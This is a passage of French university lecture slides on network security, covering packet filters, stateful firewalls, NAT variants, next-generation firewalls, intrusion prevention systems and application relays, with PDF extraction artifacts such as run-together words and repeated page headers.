Page 144: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les pare-feux

Sont placés en "coupure" du réseauCoupent la communication ou la laissent passer sans lamodifierNe nécessitent pas de configurer les machines ou les logiciels

[email protected] Sécurité Informatique/ March 31, 2018 144 / 381

Page 145: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Définition

Décide du passage de chaque paquet sans le replacer dans lecontexteSuivant les critères du paquet

Source,destinationOptions IP,ICMP,UDP,TCP(ACK,SYN,etc ...)

Suivant des critères extérieurs (rares)heure, charge, etc...

[email protected] Sécurité Informatique/ March 31, 2018 145 / 381

Page 146: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Formalisation

Source : machine qui envoie le paquetC’est le début de la flèche (cf schéma)

Destination : machine à qui le paquet est envoyé.C’est la pointe de la flèche.

Source/Destination notion différente de Client/ServeurInscrit dans l’en-tête IP des paquets.

[email protected] Sécurité Informatique/ March 31, 2018 146 / 381

Page 147: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Avantages

Le plus rapide, il peut même être placé surDes Network processeursDes FPGAdes ASICs

Le plus simple à installerTrès efficace pour des séparations de réseaux

[email protected] Sécurité Informatique/ March 31, 2018 147 / 381

Page 148: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Inconvénients

Règles peu lisiblesRègles nombreuses ( plusieurs centaines)Certains filtrages sont compliqués et imparfaits

FTPRPC

Ne comprend pas du tout la connexion

[email protected] Sécurité Informatique/ March 31, 2018 148 / 381

Page 149: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Trucs

Toujours définir une règle par défautelle existe toujours, mais il faut la définir

Optimisation de la vitesse :règle de passage générale des paquets acquittés (75%)

Gestion des ICMP(unreachable, etc ...) : ne pas les renvoyer

Définir les règles sur une autre machine

[email protected] Sécurité Informatique/ March 31, 2018 149 / 381

Page 150: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Trucs 2

Préférer les noms de machines dans la conception des règlesPréférer les adresses IP dans les règlesUtiliser un générateur de règles

Evite les erreurs bêtes

[email protected] Sécurité Informatique/ March 31, 2018 150 / 381

Page 151: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Questions à poser

Ordre des règles :SéquentielA précision décroissanteA branchement

Arrêt sur correspondance (on match) ?Filtres entrée et sortie ?

Pare-feu auto-protégé

Filtre indépendant sur chaque interface ?

[email protected] Sécurité Informatique/ March 31, 2018 151 / 381

Page 152: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Questions à poser.

Possibilité de mettre des filtres sur des options du paquetFiltrage sur le portCapacité de journalisationVitesse annoncée pour quelles conditions ? Quasimenttoujours pour

2 machines1 seule règle (ACCEPT)1 protocole simple

Gestion des Vlans

[email protected] Sécurité Informatique/ March 31, 2018 152 / 381

Page 153: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtrage séquentiel

Règle 1Règle 2Règle 3Règle 4Règle 5Règle 6Règle 7Règle 8Règle 9Règle 10Règle 11Règle 12Règle 13Règle 14Règle 15 Pas d ’arrêt sur correspondance

[email protected] Sécurité Informatique/ March 31, 2018 153 / 381

Page 154: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtrage par ordre de précision

Règle 1Règle 2Règle 3Règle 4Règle 5Règle 6Règle 7

Règle 2Règle 4Règle 6Règle 7Règle 5Règle 3Règle 1

192.168.0.0/16 ==> 10.0.0.0 PAS OK192.168.1.0/24 ==> 10.0.0.0 OK

192.168.1.0/24 ==> 10.0.0.0 OK 192.168.0.0/16 ==> 10.0.0.0 PAS OK

[email protected] Sécurité Informatique/ March 31, 2018 154 / 381

Page 155: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtrage par branchement

Règle 1Règle 2 Règle 2.1

Règle 2.2Règle 2.3Règle 2.4

Règle 3Règle 4Règle 5

Règle 6Règle 7Règle 8

Règle 5.2Règle 5.3

Règle 8.1Règle 8.2Règle 8.3

CorrespondanceRègle 5.1

D’oùla nécessité de permettre de continuer après un "match".

[email protected] Sécurité Informatique/ March 31, 2018 155 / 381

Page 156: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Options courantes

Limitation de débitEviter les abus internesLimiter les rebonds de flooding

Journalisationdu refusdes paquets refusés

[email protected] Sécurité Informatique/ March 31, 2018 156 / 381

Page 157: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Exemples

IOS ciscoFiltre commutateurs et routeursIptables (mais peut faire mieux)Pktfilter sur windows 2K/XP/2003De manière générale : tout filtre accéléré par ASIC

[email protected] Sécurité Informatique/ March 31, 2018 157 / 381

Page 158: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Les problèmes

Les virtualhostLes VPSLes CDN (Akamaï,Fastly, etc.)

qui à l’IP 193.51.224.6 ?crl.microsoft.comwww.france2.fr

CloudFlareSuper contre les DDoSLes pirates l’ont bien compris.... ils l’utilisent.

[email protected] Sécurité Informatique/ March 31, 2018 158 / 381

Page 159: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : Principe de Netfilter

FORWARD

INPUT OUTPUT

User-defined

Processus

User-defined

Interface(s)Interface(s)

[email protected] Sécurité Informatique/ March 31, 2018 159 / 381

Page 160: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Filtre de paquets : exercices

Filtrage en entréeAutorisez du ssh, puis du ftp passif et du ftp actif

Filtrage en sortieAutorisez du ssh, puis du ftp actif et du ftp passif

[email protected] Sécurité Informatique/ March 31, 2018 160 / 381

Page 161: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu stateful inspection

Pourquoi un pare-feu à gestion d’étatsPare-feu filtrant insuffisantTrop grande ouverture de portsIdée de conserver l’état de la connexionApparition de besoins de NAT

[email protected] Sécurité Informatique/ March 31, 2018 161 / 381

Page 162: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : Définition

Stateful, Stateful InspectionGère les différents états de la connexion (début,milieu,fin)

Ressemble au SYN, SYN-ACK, ACK de TCP. Mais pas tout àfaitFait de même avec UDP (Travaille sur les ports et le timeout)

Un critère de filtrage apparaît: l’état.C’est la seule définition !Recouvre plusieurs réalités

[email protected] Sécurité Informatique/ March 31, 2018 162 / 381

Page 163: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : TCP

Serveur IP-SPort-S

Paquet 1

Paquet 2

Paquet 3

Communication

Paquet 1500

Paquet 1501

Rien pendant 300 sec

Paquet 1502

IP-C:P-C / IP-S:P-S / NEW / 29

IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

IP-C:P-C / IP-S:P-S / ESTABLISHED / 179

IP-C:P-C / IP-S:P-S / ESTABLISHED / 179

RIEN ==> Timeout

IP-C:P-C / IP-S:P-S / NEW / 29

Critère d ’état, Timeout

[email protected] Sécurité Informatique/ March 31, 2018 163 / 381

Page 164: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : UDP

Client IP-CPort-C

Serveur IP-SPort-S

Paquet 1

Paquet 2

Paquet 3

Communication

Paquet 1500

Paquet 1501

Rien pendant 300 sec

Paquet 1502

IP-C:P-C / IP-S:P-S / NEW / 29

IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

IP-C:P-C / IP-S:P-S / ESTABLISHED / 179

IP-C:P-C / IP-S:P-S / ESTABLISHED / 179

RIEN ==> Timeout

IP-C:P-C / IP-S:P-S / NEW / 29

Critère d ’état, Timeout

[email protected] Sécurité Informatique/ March 31, 2018 164 / 381

Page 165: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Plus simplement

Le fils va dehors avec un seau d’eau => NEWLa fille cours après son frère, trempée => ESTABLISHEDCourse poursuite => ESTABLISHEDIls font la paix => FINL’un d’eux se casse la figure => RSTIls arrêtent pendant 15 minutes => TIMEOUT

[email protected] Sécurité Informatique/ March 31, 2018 165 / 381

Page 166: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu stateful : définition (2)

Les meilleurs stateful analysent le contenu (STIC)Les filtres sont donc dynamiquesRares sont les STIC qui font tous les protocoles

Certains n’analysent pas du tout le contenu (STI)

[email protected] Sécurité Informatique/ March 31, 2018 166 / 381

Page 167: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : FTP

Client IP-cPort-C

Serveur IP-Sport 21

SYN (1000)

SYN (2000),ACK(1001)

ACK(2001)

Communication Etablie

PORT, IP-C,P-C2

200 PORT OK

IP-C:P-C / IP-S:21 / NEW / 29

IP-C:P-C / IP-S:21 / ESTABLISHED / 29

IP-C:P-C / IP-S:21 / ESTABLISHED / 890

IP-C:P-C / IP-S:P-S / ESTABLISHED / 890

IP-C:P-C2 / IP-S:20 / RELATED / 890

[email protected] Sécurité Informatique/ March 31, 2018 167 / 381

Page 168: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : Avantages

Rapide (mais l’analyse du contenu ralentit légèrement)Plus précis et donc plus efficace (STIC)Règles plus simples (STIC)Règles moins nombreuses (STIC)

[email protected] Sécurité Informatique/ March 31, 2018 168 / 381

Page 169: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : Inconvénients

Attention, l’analyse de contenu n’est pas toujours présenteNe comprend pas la communicationTous les protocoles ne peuvent pas passer (X11)

[email protected] Sécurité Informatique/ March 31, 2018 169 / 381

Page 170: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : Questions à poser

Idem filtre de paquetsSTIC ou STI ?

Quels protocoles sont supportés ?

Ajout de nouveaux protocolesGestion des N° de séquence ?Vitesse annoncée pour quelle protection ?Attention aux optimisations sur le matériel

[email protected] Sécurité Informatique/ March 31, 2018 170 / 381

Page 171: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : Options courantes

Les mêmes qu’avec les filtres de paquetsPlugin vers des fonctions évoluées

Filtrage d’URL (STIC) par CVPLutte antivirale (STIC) par CVP

Plugin vers des relais applicatifsAuthentification sur certains protocolesLe NATLe Tarpit

[email protected] Sécurité Informatique/ March 31, 2018 171 / 381

Page 172: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : Exemples

Checkpoint Firewall-1 (STIC)Netfilter (IPTables) de Linux (STIC)IOS Firewall de CISCO (STIC)Clavister (STI)

[email protected] Sécurité Informatique/ March 31, 2018 172 / 381

Page 173: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : Le NAT

Network Address TranslationModification de l’adresse visible d’une machine interne (IP-eau lieu de IP-i)Deux buts

Pallier à un manque d’adresses (utilisation des RFC3330)Cacher pour protéger

De nombreuses manières de l’implémenter

[email protected] Sécurité Informatique/ March 31, 2018 173 / 381

Page 174: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : le SNAT

Source Network Address TranslationOn change l’adresse du clientC’est l’utilisation principalePermet d’avoir un grand nombre d’adresses IP

[email protected] Sécurité Informatique/ March 31, 2018 174 / 381

Page 175: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : le SNAT

123.45.67.89:80 10.1.1.2:3456123.45.67.89:80 12.1.1.4:3456

123.45.67.89:80 12.1.1.4:3456 123.45.67.89:80 10.1.1.2:3456

Client C1Serveur S1

InterneExterne

[email protected] Sécurité Informatique/ March 31, 2018 175 / 381

Page 176: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : le DNAT

Destination Network Address TranslationPlus rarement utiliséePour des serveurs en DMZPour des serveurs derrière une adresse uniquePermet un pseudo équilibrage de chargePeut-être utilisé pour des processus de diversion

[email protected] Sécurité Informatique/ March 31, 2018 176 / 381

Page 177: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : le DNAT

123.45.67.89:3456 10.1.1.2:80

123.45.67.89:3456 12.1.1.4:80

123.45.67.89:3456 12.1.1.4:80 123.45.67.89:3456 10.1.1.2:80

Client C1 Serveur S1

InterneExterne

[email protected] Sécurité Informatique/ March 31, 2018 177 / 381

Page 178: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT dynamique

L’adresse visible fait partie d’un poolGénéralement dans le cas d’un SNATPool-e < Pool-iLa correspondance IP-e et IP-i est variable dans le temps (à laDHCP)

[email protected] Sécurité Informatique/ March 31, 2018 178 / 381

Page 179: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT dynamique

123.45.67.89:80 10.1.1.2:3456123.45.67.89:80 12.1.1.4:3456

123.45.67.89:80 12.1.1.4:3456 123.45.67.89:80 10.1.1.2:3456

11.11.11.11 :80 10.1.1.4:6789

11.11.11.11 :80 10.1.1.4: 6789

11.11.11.11:80 12.1.1.5:6789

11.11.11.11 :80 12.1.1.5:6789

Client C1

Client C2Pare-feuServeur S2

Serveur S1

InterneExterne

[email protected] Sécurité Informatique/ March 31, 2018 179 / 381

Page 180: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : le SAT

Static Address TranslationLa correspondance IP-e et IP-i est constanteRéservé à des serveurs accessibles : DNATPour les clients si Pool-e = Pool-i

[email protected] Sécurité Informatique/ March 31, 2018 180 / 381

Page 181: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : le PAT

PAT : Port Address translationCorrespond à la quasi totalité des NAT grand publicDans le cas où Pool-e = 1On est obligé de changer le port source pour différencier lesmachinesAppelé aussi mascaradePeut-être utilisé en complément des autres méthodes

[email protected] Sécurité Informatique/ March 31, 2018 181 / 381

Page 182: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : le PAT

123.45.67.89:80 10.1.1.2:3456123.45.67.89:80 12.1.1.3.8001

123.45.67.89:80 12.1.1 .3.8001 123.45.67.89:80 10.1.1.2:3456

11.11.11.11 :80 10.1.1.4:6789

11.11.11.11 :80 10.1.1.4: 6789

11.11.11.11:80 12.1.1.3.8002

11.11.11.11 :80 12.1.1.3.8002

Client C1

Client C2Pare-feuServeur S2

Serveur S1

InterneExterne

[email protected] Sécurité Informatique/ March 31, 2018 182 / 381

Page 183: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : problème

Les mêmes que le Stateful : où se fait le changement ?En-têtes IP, TCP et UDP (STI)

123.45.67.89:21 10.1.1.2:3456

CMD : « port 10,1,1,2,6789 »

123.45.67.89:21 12.1.1.3:8001

CMD : « port 10,1,1,2,6789 »

123.45.67.89:20 10,1,1,2,6789

InterneExterne

!!!10.1.1.2

[email protected] Sécurité Informatique/ March 31, 2018 183 / 381

Page 184: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Stateful : le NAT : solution

On ne se limite plus aux en-têtesEn-têtes IP, TCP et UDP (STI)Et on ajoute :

Modification dans les messages

123.45.67.89:21 10.1.1.2:3456

CMD : « port 10,1,1,2,6789 »

123.45.67.89:21 12.1.1.3:8001

CMD : « port 12,1,1,3,8002 »

123.45.67.89:20 12.1.1.3:8002 123.45.67.89:80 10.1.1.2:6789

InterneExterne

[email protected] Sécurité Informatique/ March 31, 2018 184 / 381

Page 185: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

NAT et Filtrage : Netfilter

FORWARD

INPUT OUTPUT

User-defined

Processus

User-defined

Interface(s)Interface(s)

PREROUTING POSTROUTING

[email protected] Sécurité Informatique/ March 31, 2018 185 / 381

Page 186: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu deep-inspection

Terme à relent marketingEvolution du stateful inspectionVérifie la conformité aux RFCA la limite du relais applicatifs (cf suite)Mais est-ce différent des IPS ?Concurrencé par la Firewall NG "Next Generation"

[email protected] Sécurité Informatique/ March 31, 2018 186 / 381

Page 187: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Next-Generation

Terme à relent marketingEvolution du stateful inspectionutilisation de paramètres supplémentaires

l’identité de la personnel’application (et non plus le port), surtout que tout passe parle 80.

FacebookGmailGoogleDrive

[email protected] Sécurité Informatique/ March 31, 2018 187 / 381

Page 188: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu Next-Generation

Recouvre beaucoup de réalitésComment se fait la détection de la personne

Par remontée de l’authentification AD ?Par l’installation d’un client ?

Comment-est utilisée cette authentification ?Une personne <=> 1 IP ?Une communication <=> 1 personne ?Est-ce dynamique ?

Comment sont détectées les applications ?par schéma ? (donc abonnement ?)par url ?par IP ?

[email protected] Sécurité Informatique/ March 31, 2018 188 / 381

Page 189: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu NG : avantages

Simplicité de la maintenance (changement d’IP = pas dechangement de droit)On sait QUI a accès.On devient très fin dans le filtrage.

[email protected] Sécurité Informatique/ March 31, 2018 189 / 381

Page 190: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu NG : inconvénients

Incompatible avec du "wirespeed" (reconstitution des paquets)Ne pourra jamais aller aussi loin qu’un relais applicatifDégâts collatéraux

[email protected] Sécurité Informatique/ March 31, 2018 190 / 381

Page 191: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pare-feu NG : acteurs

Palo Altoiptables + L7 Filter + NuFW (UFWi)Maintenant tout FW est forcément NG.....

[email protected] Sécurité Informatique/ March 31, 2018 191 / 381

Page 192: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les I.P.S.

Intrusion Prevention SystemEncore un niveau supplémentaire vis-à-vis du deep-inspection

Réassemble les paquetsNormalise les communicationsVérifie la conformité aux RFCLes compare à une base d’attaque

C’est un routeur qui fait de la détection d’intrusion et qui agit: IDS (Intrusion Detection System) n’était pas assez vendeur

[email protected] Sécurité Informatique/ March 31, 2018 192 / 381

Page 193: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection IPS : Avantages

Peut protéger d’attaques très sophistiquéesNe nécessite pas de modification d’architecture ou des clientsParfois inattaquable car indétectable (pas d’adresse IP)Peut couper ou limiter des flux interdits

[email protected] Sécurité Informatique/ March 31, 2018 193 / 381

Page 194: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison deschémas)Demande une machine adaptée au débit pour des coupurescomplexesDégâts collatéraux plus nombreux que le deep inspection

[email protected] Sécurité Informatique/ March 31, 2018 194 / 381

Page 195: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection IPS : Exemples

NetASQTippingpointSnort InlineGuardian pour iptablesIptables et module stringHogwashDsniffHunt, Juggernaut, Couic

[email protected] Sécurité Informatique/ March 31, 2018 195 / 381

Page 196: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison deschémas)Demande une machine adaptée au débit pour des coupurescomplexesDégâts collatéraux plus nombreux que le deep inspection

[email protected] Sécurité Informatique/ March 31, 2018 196 / 381

Page 197: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection IPS : Questions à poser

Nombre de règlesMise à jour des règles (qui, d’où)

[email protected] Sécurité Informatique/ March 31, 2018 197 / 381

Page 198: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les boites noires

Les firewall tout faits :Ont un OS

CISCO IOS-XR => QNX NeutrinoJuniper JunOS => FreeBSD 4.10Alcatel TimOS => VXWorksHuawei VRP => VXWorksNetASQ => FreeBSDArkoon => LinuxSideWinder => Linux (SeLinux)

Sont parfois aidés de composants

[email protected] Sécurité Informatique/ March 31, 2018 198 / 381

Page 199: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Boites noires et circuits

L’aide hardware est précieusePlus rapideMoins chèreMoins consommatrice

Mais elle pose des problèmesASICs : rapides, économiques mais fixes et peu intelligentsFPGA : assez rapides, modifiables mais peu intelligentsNetwork processors : intelligents, relativement rapides maisgourmands et chers

[email protected] Sécurité Informatique/ March 31, 2018 199 / 381

Page 200: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les relais

Après les douves, les ponts

[email protected] Sécurité Informatique/ March 31, 2018 200 / 381

Page 201: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais : Définition

Les relais travaillent sur le passage et non la coupureLe principe est : "laisse faire un professionnel."Ils dissimulent le client (authentification externe par l’adresseIP)

[email protected] Sécurité Informatique/ March 31, 2018 201 / 381

Page 202: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais : Définition (2)

Relais

Réseaux locauxRéseaux & serveursdistants

[email protected] Sécurité Informatique/ March 31, 2018 202 / 381

Page 203: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais : Définition (3)

Si on ne coupe pas:

[email protected] Sécurité Informatique/ March 31, 2018 203 / 381

Page 204: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais : Définition (4)

Machinecliente C

Serveur S

Serveur S2 Interdit

Règles

Logs

Port du

relais

Accepte

Redirige

DécisionC-R

R-S

R-S2

Relais R

[email protected] Sécurité Informatique/ March 31, 2018 204 / 381

Page 205: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les relais génériques

La standardisteC’est un relais génériqueGénéralement placé au niveau circuit (TCP ou UDP)La communication C-R encapsule la communication C-S.Le client demande au relais une communication à l’extérieurAutorisation basée sur

l’origine (machine, port)la destination (machine, port)l’identification ou l’authentification du client pour toutprotocole

[email protected] Sécurité Informatique/ March 31, 2018 205 / 381

Page 206: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais circuit : Avantages

Laisse passer beaucoup de protocolesPermet de bloquer

Sur l’origine et la destinationL’identité de l’utilisateur

JournaliseLes protagonistes (leur IP, leur port)Taille, durée, identité, etc..

Simplicité du serveurRègles simples

Simplicité du clientUn paramétrage une fois pour toutes

[email protected] Sécurité Informatique/ March 31, 2018 206 / 381

Page 207: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Relais circuit : Inconvénients

